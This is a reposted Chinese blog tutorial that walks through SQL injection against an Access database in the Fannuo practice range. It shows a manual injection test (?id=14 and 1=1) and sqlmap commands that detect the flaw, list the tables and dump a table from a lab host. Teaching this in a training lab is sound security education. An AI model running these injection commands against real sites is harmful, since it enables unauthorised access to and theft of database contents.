欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 科技 > 能源 > ACCESS 工具注入实战 凡诺靶场

ACCESS 工具注入实战 凡诺靶场

2025/2/24 20:29:49 来源:https://blog.csdn.net/baishiqi12/article/details/141461675  浏览:    关键词:ACCESS 工具注入实战 凡诺靶场

简介

        Access数据库注入攻击是一种常见的网络安全,通过注入SQL代码来获取未授权的数据访问权限。这种攻击利用了应用程序与数据库之间的交互漏洞,攻击者通过输入特定的SQL代码片段来操纵数据库查询,从而绕过应用程序的安全机制,获取信息或执行操作。

 以下是具体的操作流程:

1、打开⽹⻚判断是否存在注⼊

使用命令 ?id=14 and 1=1  确定为数字注入

2、⽤sqlmap⼯具扫描注⼊点

使用kali自带sqlmap系统

使用语句  sqlmap -u http://192.168.10.101/news_view.asp?id=14

如下图则说明存在sql注⼊

3、查询表名

因为access数据库没有库,使用语句  sqlmap -u http://192.168.10.101/news_view.asp?id=14 --tables --batch  即可查询表名

 

4、查询列名

使用语句  sqlmap -u http://192.168.10.101/news_view.asp?id=14 -T products --dump --batch

以此可以得出相关数据

安全

网络安全靠人民,网络安全为人民

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词